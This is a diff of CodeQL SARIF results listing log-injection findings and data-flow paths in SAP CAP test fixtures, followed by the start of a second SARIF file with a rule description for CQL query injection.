"text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e05b39891dddd161:1", + "primaryLocationStartColumnFingerprint" : "40" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 20 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 25 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 13, + "endColumn" : 25 + } + }, + "message" : { + "text" : "$" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + }, + "message" : { + "text" : "$" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + } ], + "newlineSequences" : [ "\r\n", "\n", "
", "
" ], + "columnKind" : "utf16CodeUnits", + "properties" : { + "codeqlConfigSummary" : { + "disableDefaultQueries" : false, + "queries" : [ { + "type" : "builtinSuite", + "uses" : "security-extended" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" + } ] + }, + "metricResults" : [ { + "rule" : { + "id" : "js/summary/lines-of-code", + "index" : 101, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-code", + "value" : 2973 + }, { + "rule" : { + "id" : "js/summary/lines-of-user-code", + "index" : 102, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-user-code", + "value" : 2973, + "baseline" : 0 + } ], + "semmle.formatSpecifier" : "sarif-latest" + } + } ] +}{ + "$schema" : "https://json.schemastore.org/sarif-2.1.0.json", + "version" : "2.1.0", + "runs" : [ { + "tool" : { + "driver" : { + "name" : "CodeQL", + "organization" : "GitHub", + "semanticVersion" : "2.15.1", + "notifications" : [ { + "id" : "cli/expected-extracted-files/javascript", + "name" : "cli/expected-extracted-files/javascript", + "shortDescription" : { + "text" : "Expected extracted files" + }, + "fullDescription" : { + "text" : "Files appearing in the source archive that are expected to be extracted." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "expected-extracted-files", "telemetry" ], + "languageDisplayName" : "JavaScript" + } + }, { + "id" : "cli/expected-extracted-files/python", + "name" : "cli/expected-extracted-files/python", + "shortDescription" : { + "text" : "Expected extracted files" + }, + "fullDescription" : { + "text" : "Files appearing in the source archive that are expected to be extracted." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "expected-extracted-files", "telemetry" ], + "languageDisplayName" : "Python" + } + } ], + "rules" : [ ] + }, + "extensions" : [ { + "name" : "advanced-security/javascript-sap-cap-queries", + "semanticVersion" : "0.2.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "rules" : [ { + "id" : "js/cap-sql-injection", + "name" : "js/cap-sql-injection", + "shortDescription" : { + "text" : "CQL query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building a 